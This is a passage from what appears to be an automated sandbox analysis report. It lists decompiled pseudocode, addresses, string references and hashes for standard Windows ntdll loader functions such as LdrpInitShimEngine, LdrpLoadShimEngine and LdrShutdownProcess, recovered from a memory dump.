					if((_t61 & 0x00000003) != 0) {
						E1D7BE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x1d8337c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x1d835d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E1D777DF6( *((intOrPtr*)(_t108 + 0xc)));
					E1D75D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E1D736868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x1d8337c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x1d839208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x1d835b24; // 0x1ab2b50
					asm("ror esi, cl");
					 *0x1d8391e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E1D736565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}









































                                                                                                                              0x1d736415
                                                                                                                              0x1d736422
                                                                                                                              0x1d73642e
                                                                                                                              0x1d73642f
                                                                                                                              0x1d736434
                                                                                                                              0x1d73643a
                                                                                                                              0x1d73643b
                                                                                                                              0x1d736440
                                                                                                                              0x1d736446
                                                                                                                              0x1d73644e
                                                                                                                              0x1d736458
                                                                                                                              0x1d736460
                                                                                                                              0x1d736465
                                                                                                                              0x1d73646c
                                                                                                                              0x1d799770
                                                                                                                              0x1d799776
                                                                                                                              0x1d799779
                                                                                                                              0x1d7997b3
                                                                                                                              0x1d7997b3
                                                                                                                              0x1d7997dd
                                                                                                                              0x1d7997dd
                                                                                                                              0x1d7997e3
                                                                                                                              0x1d7997e3
                                                                                                                              0x1d736542
                                                                                                                              0x1d736542
                                                                                                                              0x1d73654a
                                                                                                                              0x1d79982b
                                                                                                                              0x1d79982b
                                                                                                                              0x1d736557
                                                                                                                              0x1d736558
                                                                                                                              0x1d736559
                                                                                                                              0x1d736564
                                                                                                                              0x1d736564
                                                                                                                              0x1d79977b
                                                                                                                              0x1d79977c
                                                                                                                              0x1d799781
                                                                                                                              0x1d799783
                                                                                                                              0x1d799788
                                                                                                                              0x1d7997a0
                                                                                                                              0x1d7997a0
                                                                                                                              0x1d7997a5
                                                                                                                              0x1d7997aa
                                                                                                                              0x1d7997b0
                                                                                                                              0x00000000
                                                                                                                              0x1d7997b0
                                                                                                                              0x1d73647e
                                                                                                                              0x1d73648b
                                                                                                                              0x1d736498
                                                                                                                              0x1d73649e
                                                                                                                              0x1d7997ed
                                                                                                                              0x1d7997ed
                                                                                                                              0x1d7364a4
                                                                                                                              0x1d7364a6
                                                                                                                              0x1d7997f7
                                                                                                                              0x1d7997fc
                                                                                                                              0x1d7997fe
                                                                                                                              0x1d7997ce
                                                                                                                              0x1d7997d3
                                                                                                                              0x1d7997d8
                                                                                                                              0x1d7997d8
                                                                                                                              0x1d7997db
                                                                                                                              0x00000000
                                                                                                                              0x1d7364ac
                                                                                                                              0x1d7364b0
                                                                                                                              0x1d7364be
                                                                                                                              0x1d7364c3
                                                                                                                              0x1d7364cc
                                                                                                                              0x1d7364d1
                                                                                                                              0x1d7364d8
                                                                                                                              0x1d799802
                                                                                                                              0x1d799808
                                                                                                                              0x1d79980b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79978f
                                                                                                                              0x1d799790
                                                                                                                              0x1d799795
                                                                                                                              0x1d799796
                                                                                                                              0x1d79979b
                                                                                                                              0x00000000
                                                                                                                              0x1d79979b
                                                                                                                              0x1d7364de
                                                                                                                              0x1d7364eb
                                                                                                                              0x1d7364f1
                                                                                                                              0x1d7364f9
                                                                                                                              0x1d736507
                                                                                                                              0x1d736510
                                                                                                                              0x1d73651c
                                                                                                                              0x1d736526
                                                                                                                              0x1d73652c
                                                                                                                              0x1d73653c
                                                                                                                              0x1d79981d
                                                                                                                              0x1d79981d
                                                                                                                              0x1d73653c
                                                                                                                              0x00000000
                                                                                                                              0x1d736526

                                                                                                                              APIs
                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 1D73651C
                                                                                                                                • Part of subcall function 1D736565: RtlDebugPrintTimes.NTDLL ref: 1D736614
                                                                                                                                • Part of subcall function 1D736565: RtlDebugPrintTimes.NTDLL ref: 1D73665F
                                                                                                                              Strings
                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D799790
                                                                                                                              • LdrpInitShimEngine, xrefs: 1D799783, 1D799796, 1D7997BF
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 1D7997A0, 1D7997C9
                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D7997B9
                                                                                                                              • apphelp.dll, xrefs: 1D736446
                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D79977C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 3446177414-204845295
                                                                                                                              • Opcode ID: a0654c9d6c807eb68124c982fef8aa7285c6e9d8c0b05fcdf55654ccdf64b0c8
                                                                                                                              • Instruction ID: 8bc968ae44316a9aba7d0cc6d4fa6fea313a60f8b47ed7c3054e99a66e02762d
                                                                                                                              • Opcode Fuzzy Hash: a0654c9d6c807eb68124c982fef8aa7285c6e9d8c0b05fcdf55654ccdf64b0c8
                                                                                                                              • Instruction Fuzzy Hash: E851C075208351ABE315CF20D885BAA77E8AF84674F41492AF68997262DB30E904CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7BFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 17%
                                                                                                                              			E1D7BFA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E1D7BF899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x1d8337c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E1D7BE692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x1d8337c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x1d83391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x1d8391e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E1D776010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x1d8391e0(4,  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

























                                                                                                                              0x1d7bfa10
                                                                                                                              0x1d7bfa12
                                                                                                                              0x1d7bfa18
                                                                                                                              0x1d7bfa1d
                                                                                                                              0x1d7bfa2b
                                                                                                                              0x1d7bfa30
                                                                                                                              0x1d7bfa35
                                                                                                                              0x1d7bfa3a
                                                                                                                              0x1d7bfa3c
                                                                                                                              0x1d7bfa40
                                                                                                                              0x1d7bfa42
                                                                                                                              0x1d7bfa42
                                                                                                                              0x1d7bfa47
                                                                                                                              0x1d7bfa50
                                                                                                                              0x1d7bfa51
                                                                                                                              0x1d7bfa54
                                                                                                                              0x1d7bfa6d
                                                                                                                              0x1d7bfa72
                                                                                                                              0x1d7bfa77
                                                                                                                              0x1d7bfa7c
                                                                                                                              0x1d7bfa7e
                                                                                                                              0x1d7bfa7e
                                                                                                                              0x1d7bfa81
                                                                                                                              0x1d7bfa99
                                                                                                                              0x00000000
                                                                                                                              0x1d7bfa83
                                                                                                                              0x1d7bfa8a
                                                                                                                              0x1d7bfa8d
                                                                                                                              0x1d7bfa9b
                                                                                                                              0x1d7bfa9b
                                                                                                                              0x00000000
                                                                                                                              0x1d7bfa95
                                                                                                                              0x1d7bfa95
                                                                                                                              0x1d7bfa9d
                                                                                                                              0x1d7bfa9d
                                                                                                                              0x1d7bfaa2
                                                                                                                              0x1d7bfb01
                                                                                                                              0x1d7bfb01
                                                                                                                              0x1d7bfb06
                                                                                                                              0x1d7bfb0a
                                                                                                                              0x1d7bfb0c
                                                                                                                              0x1d7bfb0c
                                                                                                                              0x1d7bfb15
                                                                                                                              0x1d7bfb1d
                                                                                                                              0x1d7bfb1d
                                                                                                                              0x00000000
                                                                                                                              0x1d7bfaa8
                                                                                                                              0x1d7bfaae
                                                                                                                              0x1d7bfab4
                                                                                                                              0x1d7bfaba
                                                                                                                              0x1d7bfabd
                                                                                                                              0x1d7bfac4
                                                                                                                              0x1d7bfac7
                                                                                                                              0x1d7bfacf
                                                                                                                              0x1d7bfad4
                                                                                                                              0x1d7bfae5
                                                                                                                              0x1d7bfae8
                                                                                                                              0x1d7bfad6
                                                                                                                              0x1d7bfad6
                                                                                                                              0x1d7bfadd
                                                                                                                              0x1d7bfadd
                                                                                                                              0x1d7bfaf3
                                                                                                                              0x1d7bfafb
                                                                                                                              0x1d7bfaff
                                                                                                                              0x1d7bfb21
                                                                                                                              0x1d7bfb25
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7bfaff
                                                                                                                              0x1d7bfaa2
                                                                                                                              0x1d7bfa8d

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                              • API String ID: 3446177414-4227709934
                                                                                                                              • Opcode ID: fa3bf088c7d543edd1198f72e48c091a26aa979fbd78c3bd6d084acabd2ccd5b
                                                                                                                              • Instruction ID: 2308fbe2e6812bddac6a8e802ad342865bca23fafa67dbe70de6fa7e120bc1bf
                                                                                                                              • Opcode Fuzzy Hash: fa3bf088c7d543edd1198f72e48c091a26aa979fbd78c3bd6d084acabd2ccd5b
                                                                                                                              • Instruction Fuzzy Hash: CD415076D00219ABCB05DF94C884AEEBBB5FF89764F11412AED44A7341D772EE01CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D736565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 59%
                                                                                                                              			E1D736565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x1d83b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E1D75E8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x1d839200; // 0x0
				_t113 = 0x20;
				 *0x1d8365f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E1D76E7E0(_t92, _v92);
					}
					_t114 =  *0x1d839210; // 0x0
					asm("ror esi, cl");
					 *0x1d8391e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x1d839218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E1D74FED0(0x1d8332d8);
					_t98 = 0x1d835d8c;
					if( *0x1d8365f0 != 0) {
						_t56 =  *0x1d835d8c; // 0x1ab2b50
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x1d835d8c; // 0x1ab2b50
						if( *0x1d8365f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x1d8365f0 = 1;
							 *0x1d8365f8 = 0;
							E1D74E740(_t98);
							E1D73676F(_t98);
							return E1D784B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d8332d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x1ab2b18
								_t98 =  *_t24;
								E1D736704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x1d835d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E1D785050(_t92,  &_v108, _t110);
					_t92 = E1D736B45( &_v108,  &_v92, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x1d8337c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E1D7BE692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x1d8337c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E1D777DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x1d8391e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E1D75D3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E1D7616EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x1d8337c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E1D7BE692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x1d8337c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E1D7C1D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E1D782C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}































                                                                                                                              0x1d736574
                                                                                                                              0x1d73657d
                                                                                                                              0x1d736581
                                                                                                                              0x1d73658b
                                                                                                                              0x1d736590
                                                                                                                              0x1d736598
                                                                                                                              0x1d7365a3
                                                                                                                              0x1d7365a6
                                                                                                                              0x1d7365ad
                                                                                                                              0x1d7365b1
                                                                                                                              0x1d7365b3
                                                                                                                              0x1d7365b8
                                                                                                                              0x1d736637
                                                                                                                              0x1d736637
                                                                                                                              0x1d73663a
                                                                                                                              0x1d73663e
                                                                                                                              0x1d7366fa
                                                                                                                              0x1d7366fa
                                                                                                                              0x1d73664c
                                                                                                                              0x1d736659
                                                                                                                              0x1d73665f
                                                                                                                              0x1d736665
                                                                                                                              0x1d736667
                                                                                                                              0x1d73666f
                                                                                                                              0x1d736678
                                                                                                                              0x1d73667d
                                                                                                                              0x1d736684
                                                                                                                              0x1d736686
                                                                                                                              0x1d736692
                                                                                                                              0x1d736697
                                                                                                                              0x1d7998c3
                                                                                                                              0x1d7998d3
                                                                                                                              0x1d7998d3
                                                                                                                              0x1d7998d5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7998ca
                                                                                                                              0x1d7998cd
                                                                                                                              0x1d7998cd
                                                                                                                              0x1d7998cd
                                                                                                                              0x1d7998d1
                                                                                                                              0x1d7998d1
                                                                                                                              0x00000000
                                                                                                                              0x1d73669d
                                                                                                                              0x1d73669d
                                                                                                                              0x1d7366a4
                                                                                                                              0x1d7366aa
                                                                                                                              0x1d7366ac
                                                                                                                              0x1d7366ac
                                                                                                                              0x1d7366b0
                                                                                                                              0x1d7366c9
                                                                                                                              0x1d7366cb
                                                                                                                              0x1d7366d7
                                                                                                                              0x1d7366dc
                                                                                                                              0x1d7366e1
                                                                                                                              0x1d7366f6
                                                                                                                              0x1d7366b2
                                                                                                                              0x1d7366b2
                                                                                                                              0x1d7366b2
                                                                                                                              0x1d7366b5
                                                                                                                              0x1d7366b7
                                                                                                                              0x1d7366b7
                                                                                                                              0x1d7366ba
                                                                                                                              0x1d7366bf
                                                                                                                              0x1d7366c1
                                                                                                                              0x00000000
                                                                                                                              0x1d7366b2
                                                                                                                              0x1d7366b0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7365ba
                                                                                                                              0x1d7365ba
                                                                                                                              0x1d7365bf
                                                                                                                              0x1d7365d5
                                                                                                                              0x1d7365d9
                                                                                                                              0x1d799835
                                                                                                                              0x1d79983a
                                                                                                                              0x1d79983c
                                                                                                                              0x1d79983e
                                                                                                                              0x1d799859
                                                                                                                              0x1d79985e
                                                                                                                              0x1d799863
                                                                                                                              0x1d799863
                                                                                                                              0x1d799866
                                                                                                                              0x1d799868
                                                                                                                              0x1d79986a
                                                                                                                              0x1d79986a
                                                                                                                              0x1d79986d
                                                                                                                              0x00000000
                                                                                                                              0x1d79986d
                                                                                                                              0x1d7365e2
                                                                                                                              0x1d7365ec
                                                                                                                              0x1d7365f1
                                                                                                                              0x1d7365f4
                                                                                                                              0x1d7365f7
                                                                                                                              0x1d7365fb
                                                                                                                              0x1d73660f
                                                                                                                              0x1d736614
                                                                                                                              0x1d73661a
                                                                                                                              0x1d73661c
                                                                                                                              0x1d73661f
                                                                                                                              0x00000000
                                                                                                                              0x1d73661f
                                                                                                                              0x1d736602
                                                                                                                              0x1d736606
                                                                                                                              0x1d799875
                                                                                                                              0x1d79987a
                                                                                                                              0x1d79987c
                                                                                                                              0x1d79987e
                                                                                                                              0x1d799880
                                                                                                                              0x1d79989a
                                                                                                                              0x1d79989f
                                                                                                                              0x1d7998a4
                                                                                                                              0x1d7998a7
                                                                                                                              0x1d7998a9
                                                                                                                              0x1d7998ab
                                                                                                                              0x1d7998ab
                                                                                                                              0x1d7998ac
                                                                                                                              0x1d7998ae
                                                                                                                              0x1d7998b3
                                                                                                                              0x1d7998b4
                                                                                                                              0x1d7998b6
                                                                                                                              0x1d7998bd
                                                                                                                              0x00000000
                                                                                                                              0x1d7998bd
                                                                                                                              0x1d73660c
                                                                                                                              0x00000000
                                                                                                                              0x1d736624
                                                                                                                              0x1d73662a
                                                                                                                              0x1d73662f
                                                                                                                              0x1d736636
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D799885
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 1D799854, 1D799895
                                                                                                                              • LdrpLoadShimEngine, xrefs: 1D79984A, 1D79988B
                                                                                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D799843
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 3446177414-3589223738
                                                                                                                              • Opcode ID: 7ad08ba7b82d2067add092b24970ddda519c1bdf8e5e211ab7003d68b1a6e3df
                                                                                                                              • Instruction ID: ada66755726450a9e377555f2b6143008e3e51d611c4dcbd3cc1200df729ba4a
                                                                                                                              • Opcode Fuzzy Hash: 7ad08ba7b82d2067add092b24970ddda519c1bdf8e5e211ab7003d68b1a6e3df
                                                                                                                              • Instruction Fuzzy Hash: 6151273AA04264EFDB04DB68DC98FAD77B5AB44374F45052AE514AF2A7DB70EC00C752
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E1D76D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x1d81c5e8);
				_t68 = E1D797BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x1d835da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x1d8337c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E1D7BE692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d835dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d835da8 = 1;
				if( *0x1d8365f0 != 0) {
					_t137 =  *0x1d8391f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x1d8391e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E1D744779(_t74, _t118);
				}
				if(( *0x1d83391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x1d839234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x1d839234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x1d8368c8;
					if( *0x1d8368c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E1D7C0FC8();
							 *0x1d8368c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E1D76D8F0();
					}
					_t68 = E1D76D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x1d835da0; // 0x1adb868
				L8:
				if(_t129 != 0x1d835d9c) {
					_t18 = _t129 - 0x10; // 0x1adb858
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x1adc998
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x70b391a0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E1D75DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E1D75F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
